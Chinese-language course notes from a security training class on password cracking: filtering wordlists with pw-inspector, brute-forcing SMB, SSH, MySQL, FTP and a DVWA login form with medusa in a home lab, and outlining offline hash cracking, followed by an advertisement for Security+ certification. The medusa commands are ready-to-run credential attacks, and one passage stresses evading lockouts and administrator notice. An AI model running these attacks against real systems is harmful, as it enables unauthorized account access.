【安全牛学习笔记】在线密码破解-hydra、在线密码破解-medusa、离线密码破解

廖臻
2023-12-01

在线密码破解-----hydra                                         

pw-inspector                                     

    - 按长度和字符集筛选字典                    

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u

密码破解效率                                 

    - 密码复杂度(字典命中率)              

    - 带宽、协议、服务器性能、客户端性能                        

    - 锁定阈值                                

    - 单位时间最大登陆请求次数

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:

  -i FILE    file to read passwords from (default: stdin)

  -o FILE    file to write valid passwords to (default: stdout)

  -m MINLEN  minimum length of a valid password

  -M MAXLEN  maximum length of a valid password

  -c MINSETS the minimum number of sets required (default: all given)

Sets:

  -l         lowcase characters (a,b,c,d, etc.)

  -u         upcase characters (A,B,C,D, etc.)

  -n         numbers (1,2,3,4, etc.)

  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst

在线密码破解-----medusa                       

Hydra的缺点                                   

    - 稳定性差,程序时常崩溃                  

    - 速度控制不好,容易触发服务屏蔽或锁死机制

    - 每主机新建进程,每服务新建实例          

    - 大量目标破解时性能差                    

Medusa的特点                                  

    - 稳定性好                                

    - 速度控制得当                            

    - 基于线程                                

    - 支持模块少于hydra(不支持RDP )         

    - WEB-Form支持存在缺陷

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

oot@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/lib/medusa/modules" :

    + cvs.mod : Brute force module for CVS sessions : version 2.0

    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

    + http.mod : Brute force module for HTTP : version 2.1

    + imap.mod : Brute force module for IMAP sessions : version 2.0

    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0

    + mysql.mod : Brute force module for MySQL sessions : version 2.0

    + nntp.mod : Brute force module for NNTP sessions : version 2.0

    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

    + pop3.mod : Brute force module for POP3 sessions : version 2.0

    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

    + rexec.mod : Brute force module for REXEC sessions : version 2.0

    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

    + rsh.mod : Brute force module for RSH sessions : version 2.0

    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

    + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1

    + svn.mod : Brute force module for Subversion sessions : version 2.1

    + telnet.mod : Brute force module for telnet sessions : version 2.0

    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

    + vnc.mod : Brute force module for VNC sessions : version 2.1

    + web-form.mod : Brute force module for web forms : version 2.1

    + wrapper.mod : Generic Wrapper Module : version 2.0

在线密码破解-----medusa                              

medusa -d                                                

破解windows密码                                      

    - medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F

破解Linux SSH密码                                    

    - medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F     

其他服务密码破解                                 

    - medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F         

    - medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m           

      FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-       

      DATA:"post?user=username&pas=password&Login=Login"

msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst

XP IP地址是192.168.1.118

C:\net user administrator zipper

root@K:~# medusa -M mebnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f

root@K:~# nmap P3306 192.168.1.113

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for 192.168.1.113

Host is up (10.00036s latency).

PORT      STATE SERVOCE

3306/tcp  open  mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code  302

ACCOUNT XGWXK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:

  USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

  FORM:?             Target form to request. Default: "/"

  DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in

                     server response. Default: "Login incorrect"

  CUSTOM-HEADER:?    Custom HTTP header.

                     More headers can be defined by using this option several times.

  FORM-DATA:<METHOD>?<FIELDS>

                     Methods and fields to send to web service. Valid methods are GET and POST. The actual form

                     data to be submitted should also be defined here. Specifically, the fields: username and

                     password. The username field must be the first, followed by the password field.

                     Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"

                 -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

在线密码破解-----medusa

    - -n : 非默认端口   

    - -s : 使用SSL连接  

    - -T : 并发主机数   

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions

Available module options:

MODE:? (NORMAL*, EXPLICIT, IMPLICIT)

  EXPLICIT: AUTH TLS Mode as defined in RFC 4217

     Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to

     sending any credentials, however, an "AUTH TLS" command is issued and a

     SSL session is negotiated.

  IMPLICIT: FTP over SSL (990/tcp)

     Implicit FTPS requires a SSL handshake to be performed before any FTP

     commands are sent. This service typically resides on tcp/990. If the user

     specifies this option or uses the "-n" (SSL) option, the module will

     default to this mode and tcp/990.

  NORMAL

     The default behaviour if no MODE is specified. Authentication is attempted

     in the clear. If the server requests encryption for the given user,

     Explicit FTPS is utilized.

Example Usage:

    medusa -M ftp -h host -u username -p password

    medusa -M ftp -s -h host -u username -p password

    medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value

离线密码破解                                   

身份认证                          

    - 禁止明文传输密码                                                

    - 每次认证使用HASH算法加密密码传输)(HASH算法加密容易、解密困难)

    - 服务器端用户数据库应加盐加密保存                                

破解思路                                                              

    - 嗅探获取密码HASH                                                

    - 利用漏洞登录服务器并从用户数据库获取密码HASH                    

    - 识别HASH类型                    

      长度、字符集         

    - 利用李璇破解工具碰撞密码HASH

离线密码破解                                

优势                                        

    - 离线不会触发密码锁定机制              

    - 不会产生大量登录失败日志引起管理员注意

HASH识别工具                                

    - hash-identifier                       

    - Hashid                                

    - 可能识别错误或无法识别

火狐插件hashr

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。


 类似资料: